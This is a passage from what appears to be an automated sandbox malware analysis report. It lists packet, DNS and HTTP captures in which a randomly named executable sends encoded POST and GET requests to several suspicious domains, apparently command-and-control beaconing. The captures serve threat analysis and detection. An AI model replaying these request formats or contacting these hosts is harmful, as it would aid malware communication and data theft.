                                                    Sep 11, 2024 15:45:27.173316002 CEST4973880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:28.206747055 CEST4973880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:28.212194920 CEST80497383.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.227559090 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:29.232785940 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.235426903 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:29.247443914 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:29.252499104 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.252616882 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.705252886 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:29.705431938 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:30.755539894 CEST4973980192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:30.760777950 CEST80497393.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:31.773075104 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:31.778292894 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:31.778486013 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:31.785795927 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:31.790734053 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:32.246546984 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:32.246604919 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:32.246680975 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:32.249156952 CEST4974080192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:32.257416010 CEST80497403.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:37.277419090 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:37.282449961 CEST80497413.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:37.283512115 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:37.295428038 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:37.300415993 CEST80497413.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:37.768537998 CEST80497413.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:37.768600941 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:38.802884102 CEST4974180192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:39.049478054 CEST80497413.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:39.820318937 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:39.825649023 CEST80497423.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:39.825720072 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:39.844402075 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:39.849615097 CEST80497423.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:40.319170952 CEST80497423.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:40.319231033 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:41.347321987 CEST4974280192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:41.352593899 CEST80497423.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.365686893 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:42.371066093 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.371125937 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:42.380361080 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:42.385263920 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.385437012 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.835117102 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:42.837363005 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:43.894187927 CEST4974380192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:43.899532080 CEST80497433.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:44.913341999 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:44.919445992 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:44.919991016 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:44.929357052 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:44.937222004 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:46.317312956 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:46.317351103 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:46.317471981 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:46.320610046 CEST4974480192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:46.333163977 CEST80497443.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:51.355577946 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:51.360547066 CEST80497453.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:51.361439943 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:51.373349905 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:51.379177094 CEST80497453.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:51.828578949 CEST80497453.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:51.828653097 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:52.879426956 CEST4974580192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:52.885312080 CEST80497453.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:53.896794081 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:53.901942015 CEST80497463.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:53.902014971 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:53.913382053 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:53.918402910 CEST80497463.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:54.358490944 CEST80497463.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:54.358551025 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:55.427449942 CEST4974680192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:55.432624102 CEST80497463.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:56.444474936 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:56.450062037 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:56.450182915 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:56.461873055 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:56.466862917 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:56.467061996 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:57.836535931 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:57.836606979 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:57.972316980 CEST4974780192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:57.977499962 CEST80497473.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:58.991553068 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:58.996695042 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:58.999560118 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:59.003318071 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:59.008301973 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:59.501399994 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:59.501554012 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:45:59.503595114 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:59.504357100 CEST4974880192.168.2.83.33.130.190
                                                    Sep 11, 2024 15:45:59.509198904 CEST80497483.33.130.190192.168.2.8
                                                    Sep 11, 2024 15:46:04.610897064 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:04.616861105 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:04.616947889 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:04.625808954 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:04.630923986 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:05.086605072 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:05.086668015 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:05.086708069 CEST8049749199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:05.086752892 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:05.086802959 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:06.128643036 CEST4974980192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:07.149389029 CEST4975080192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:07.156816006 CEST8049750199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:07.157473087 CEST4975080192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:07.169382095 CEST4975080192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:07.174531937 CEST8049750199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:07.614717007 CEST8049750199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:07.614772081 CEST8049750199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:07.614808083 CEST8049750199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:07.614833117 CEST4975080192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:07.614875078 CEST4975080192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:08.675477028 CEST4975080192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:09.694428921 CEST4975180192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:09.699692011 CEST8049751199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:09.699770927 CEST4975180192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:09.712253094 CEST4975180192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:09.717653036 CEST8049751199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:09.717695951 CEST8049751199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:10.186181068 CEST8049751199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:10.186433077 CEST8049751199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:10.186450005 CEST8049751199.59.243.226192.168.2.8
                                                    Sep 11, 2024 15:46:10.186480999 CEST4975180192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:10.186521053 CEST4975180192.168.2.8199.59.243.226
                                                    Sep 11, 2024 15:46:11.675470114 CEST4975180192.168.2.8199.59.243.226

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 11, 2024 15:43:04.660456896 CEST6290453192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:43:04.937227011 CEST53629041.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:43:59.497880936 CEST5514553192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:43:59.525485039 CEST53551451.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:44:15.444056034 CEST5662553192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:44:15.482511044 CEST53566251.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:44:28.615825891 CEST5947453192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:44:29.549361944 CEST53594741.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:44:43.131700993 CEST5291953192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:44:43.557353973 CEST53529191.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:44:57.163443089 CEST6165353192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:44:57.196774006 CEST53616531.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:45:10.523432970 CEST6330953192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:45:10.849666119 CEST53633091.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:45:24.116507053 CEST6015153192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:45:24.130772114 CEST53601511.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:45:37.259437084 CEST5602053192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:45:37.273042917 CEST53560201.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:45:51.337347984 CEST5975853192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:45:51.349747896 CEST53597581.1.1.1192.168.2.8
                                                    Sep 11, 2024 15:46:04.522720098 CEST5299653192.168.2.81.1.1.1
                                                    Sep 11, 2024 15:46:04.608807087 CEST53529961.1.1.1192.168.2.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Sep 11, 2024 15:43:04.660456896 CEST192.168.2.81.1.1.10x34bStandard query (0)epsys.roA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:43:59.497880936 CEST192.168.2.81.1.1.10x2989Standard query (0)www.coffee-and-blends.infoA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:15.444056034 CEST192.168.2.81.1.1.10x42a4Standard query (0)www.mayawashfold.netA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:28.615825891 CEST192.168.2.81.1.1.10xa0caStandard query (0)www.zz82x.topA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:43.131700993 CEST192.168.2.81.1.1.10xd824Standard query (0)www.wcm50.topA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:57.163443089 CEST192.168.2.81.1.1.10xcbc3Standard query (0)www.withad.xyzA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:10.523432970 CEST192.168.2.81.1.1.10xe54dStandard query (0)www.lanxuanz.techA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:24.116507053 CEST192.168.2.81.1.1.10x84faStandard query (0)www.filelabel.infoA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:37.259437084 CEST192.168.2.81.1.1.10x99e5Standard query (0)www.comrade.lolA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:51.337347984 CEST192.168.2.81.1.1.10xf4e4Standard query (0)www.takitoon.xyzA (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:46:04.522720098 CEST192.168.2.81.1.1.10x9fceStandard query (0)www.pmjjewels.onlineA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Sep 11, 2024 15:43:04.937227011 CEST1.1.1.1192.168.2.80x34bNo error (0)epsys.ro89.42.218.72A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:43:59.525485039 CEST1.1.1.1192.168.2.80x2989No error (0)www.coffee-and-blends.info217.160.0.231A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:15.482511044 CEST1.1.1.1192.168.2.80x42a4No error (0)www.mayawashfold.netmayawashfold.netCNAME (Canonical name)IN (0x0001)false
                                                    Sep 11, 2024 15:44:15.482511044 CEST1.1.1.1192.168.2.80x42a4No error (0)mayawashfold.net3.33.130.190A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:15.482511044 CEST1.1.1.1192.168.2.80x42a4No error (0)mayawashfold.net15.197.148.33A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:29.549361944 CEST1.1.1.1192.168.2.80xa0caNo error (0)www.zz82x.topzz82x.topCNAME (Canonical name)IN (0x0001)false
                                                    Sep 11, 2024 15:44:29.549361944 CEST1.1.1.1192.168.2.80xa0caNo error (0)zz82x.top38.47.232.196A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:43.557353973 CEST1.1.1.1192.168.2.80xd824No error (0)www.wcm50.topwcm50.topCNAME (Canonical name)IN (0x0001)false
                                                    Sep 11, 2024 15:44:43.557353973 CEST1.1.1.1192.168.2.80xd824No error (0)wcm50.top154.23.184.60A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:44:57.196774006 CEST1.1.1.1192.168.2.80xcbc3No error (0)www.withad.xyz162.0.238.43A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:10.849666119 CEST1.1.1.1192.168.2.80xe54dNo error (0)www.lanxuanz.techzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 11, 2024 15:45:10.849666119 CEST1.1.1.1192.168.2.80xe54dNo error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:24.130772114 CEST1.1.1.1192.168.2.80x84faNo error (0)www.filelabel.infofilelabel.infoCNAME (Canonical name)IN (0x0001)false
                                                    Sep 11, 2024 15:45:24.130772114 CEST1.1.1.1192.168.2.80x84faNo error (0)filelabel.info3.33.130.190A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:24.130772114 CEST1.1.1.1192.168.2.80x84faNo error (0)filelabel.info15.197.148.33A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:37.273042917 CEST1.1.1.1192.168.2.80x99e5No error (0)www.comrade.lolcomrade.lolCNAME (Canonical name)IN (0x0001)false
                                                    Sep 11, 2024 15:45:37.273042917 CEST1.1.1.1192.168.2.80x99e5No error (0)comrade.lol3.33.130.190A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:37.273042917 CEST1.1.1.1192.168.2.80x99e5No error (0)comrade.lol15.197.148.33A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:51.349747896 CEST1.1.1.1192.168.2.80xf4e4No error (0)www.takitoon.xyztakitoon.xyzCNAME (Canonical name)IN (0x0001)false
                                                    Sep 11, 2024 15:45:51.349747896 CEST1.1.1.1192.168.2.80xf4e4No error (0)takitoon.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:45:51.349747896 CEST1.1.1.1192.168.2.80xf4e4No error (0)takitoon.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                    Sep 11, 2024 15:46:04.608807087 CEST1.1.1.1192.168.2.80x9fceNo error (0)www.pmjjewels.online199.59.243.226A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • epsys.ro
                                                    • www.coffee-and-blends.info
                                                    • www.mayawashfold.net
                                                    • www.zz82x.top
                                                    • www.wcm50.top
                                                    • www.withad.xyz
                                                    • www.lanxuanz.tech
                                                    • www.filelabel.info
                                                    • www.comrade.lol
                                                    • www.takitoon.xyz
                                                    • www.pmjjewels.online

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.849713217.160.0.231803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:43:59.548059940 CEST368OUTGET /v35v/?dD=3XyH6pjxGLhPK&7FhphPx8=QLykxYh4zvA0eVm/xmgK7YOftMTq5+WaLw1iNOUTi/NZcFg0+k6SoYLj+BPGFkyr7e2u2NP+bwB2tUbtyEagHZeSqjZTmkHziwyHhfbKN4nr0Mmvp+QBtaJQgZEcDG5b/A== HTTP/1.1
                                                    Host: www.coffee-and-blends.info
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:00.402527094 CEST1236INHTTP/1.1 404 Not Found
                                                    Content-Type: text/html
                                                    Content-Length: 1271
                                                    Connection: close
                                                    Date: Wed, 11 Sep 2024 13:44:00 GMT
                                                    Server: Apache
                                                    X-Frame-Options: deny
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                    Sep 11, 2024 15:44:00.402632952 CEST203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 44 45 27 0a
                                                    Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.8497143.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:15.501636982 CEST622OUTPOST /mtee/ HTTP/1.1
                                                    Host: www.mayawashfold.net
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.mayawashfold.net
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.mayawashfold.net/mtee/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 72 4b 41 55 35 31 50 6c 4b 74 6c 6f 37 55 5a 64 47 54 52 7a 4d 32 69 65 43 72 51 61 6f 6e 63 5a 6e 7a 32 6c 36 65 62 6d 4f 56 63 32 62 4d 6f 4b 31 34 6f 42 54 65 42 2b 63 45 4e 44 6b 72 65 4c 31 51 74 50 51 30 4d 77 68 76 56 4c 53 5a 51 4b 76 30 6c 6b 4a 78 71 38 64 74 44 59 51 4a 6f 6a 5a 6e 76 4d 74 63 50 34 74 53 62 43 75 45 6c 41 5a 63 34 65 43 66 33 63 72 64 4b 56 39 47 6a 33 6a 73 7a 61 66 4b 50 79 38 35 7a 37 57 34 53 46 57 58 73 78 2b 72 6f 70 4a 4c 43 6e 65 57 35 35 45 63 6f 76 65 33 54 5a 34 54 74 4a 45 61 33 7a 63 74 71 52 7a 37 63 53 54 50 63 67 53 46 53 37 53 72 57 55 6e 2b 67 3d
                                                    Data Ascii: 7FhphPx8=rKAU51PlKtlo7UZdGTRzM2ieCrQaoncZnz2l6ebmOVc2bMoK14oBTeB+cENDkreL1QtPQ0MwhvVLSZQKv0lkJxq8dtDYQJojZnvMtcP4tSbCuElAZc4eCf3crdKV9Gj3jszafKPy85z7W4SFWXsx+ropJLCneW55Ecove3TZ4TtJEa3zctqRz7cSTPcgSFS7SrWUn+g=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.8497153.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:18.038295031 CEST642OUTPOST /mtee/ HTTP/1.1
                                                    Host: www.mayawashfold.net
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.mayawashfold.net
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.mayawashfold.net/mtee/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Raw: 37 46 68 70 68 50 78 38 3d 72 4b 41 55 35 31 50 6c 4b 74 6c 6f 35 31 70 64 46 30 6c 7a 4a 57 69 64 65 37 51 61 68 48 63 56 6e 7a 4b 6c 36 63 32 72 4f 6a 45 32 61 73 34 4b 79 39 63 42 53 65 42 2b 54 6b 4e 47 71 4c 65 63 31 51 77 77 51 30 41 77 68 76 52 4c 53 59 67 4b 76 48 4e 6e 49 68 71 45 49 39 43 65 64 70 6f 6a 5a 6e 76 4d 74 63 61 58 74 53 44 43 76 77 68 41 59 39 34 64 65 76 33 62 6a 39 4b 56 33 6d 6a 37 6a 73 7a 34 66 4c 6a 63 38 38 33 37 57 35 69 46 57 47 73 75 33 72 70 69 45 72 44 59 66 6d 4e 33 46 74 4d 36 59 52 50 44 67 31 6c 75 46 73 61 5a 47 50 69 58 77 37 30 35 54 4d 30 57 58 79 50 54 49 49 47 6b 35 70 33 68 38 39 64 49 70 31 66 4d 77 56 2f 56 6f 4a 51 61 71 43 59 57
                                                    Data Ascii: 7FhphPx8=rKAU51PlKtlo51pdF0lzJWide7QahHcVnzKl6c2rOjE2as4Ky9cBSeB+TkNGqLec1QwwQ0AwhvRLSYgKvHNnIhqEI9CedpojZnvMtcaXtSDCvwhAY94dev3bj9KV3mj7jsz4fLjc8837W5iFWGsu3rpiErDYfmN3FtM6YRPDg1luFsaZGPiXw705TM0WXyPTIIGk5p3h89dIp1fMwV/VoJQaqCYW


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.8497163.33.130.190803260C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 11, 2024 15:44:20.586918116 CEST1659OUTPOST /mtee/ HTTP/1.1
                                                    Host: www.mayawashfold.net
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.mayawashfold.net
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.mayawashfold.net/mtee/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
